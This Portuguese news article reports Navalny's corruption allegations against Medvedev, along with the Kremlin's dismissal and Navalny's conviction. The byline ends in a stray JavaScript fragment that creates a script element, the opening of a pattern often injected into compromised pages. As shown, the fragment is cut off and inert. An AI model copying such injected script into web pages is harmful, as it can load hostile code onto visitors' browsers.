“Império da corrupção” na Rússia

Ekaterina Sinelschikova(*)

 

O primeiro-ministro da Rússia, Dmitri Medvedev

O primeiro-ministro da Rússia, Dmitri Medvedev, seria dono de um império de mansões, propriedades rurais no país e no exterior, iates de luxo e um palácio do século 18 em São Petersburgo, segundo o líder da oposição, Aleksdei Navalni. A soma dos bens chegaria a 70 bilhões de rublos (cerca de R$ 3,7 bilhões).

Presidente da Fundação de Luta Contra a Corrupção, Navalni fez a denúncia num vídeo de 59 minutos no YouTube, que recebeu  cerca de 3,3 milhões de visualizações em pouco mais de 24 horas.A fundação acusa o premiê de criar uma rede de oligarquias, fundações beneficentes e propriedades.

Confiança – O esquema envolveria pessoas de sua máxima confiança, como o colega de faculdade de Direito e primo, Andrei Medvedev, e o alto executivo do Gazprombank, Ilia Eliseev, apontando como operador da cadeia de corrupção.

O grupo controlava entidades que recebiam doações volumosas dos empresários mais ricos do país ou empréstimos de bancos estatais. O dinheiro usado para comprar as propriedades era, segundo Navalni, suborno e parte do esquema para disfarçar as posses de Medvedev.

Campanha – Para a porta-voz do premiê, Natália Timakova, as acusações são “de natureza claramente pré-eleitoral”. Segundo o porta-voz do Kremlin, Dmitri Peskov, o governo não tem conhecimento dos materiais da investigação, qualificada por ele como “o trabalho de um cidadão condenado”.

No mês passado, Navalni pegou cinco anos de prisão e está impedido de disputar a Presidência em 2018. Pela acusação, em 2009, Navalni, então assessor do governador da região, e o empresário Piotr Ofitserov teriam comprado material da madeireira estatal Kirovles a preços mais baixos e revendido a valor de mercado. A defesa dos dois nega o crime.

(*) Jornalista da Gazeta Russavar d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário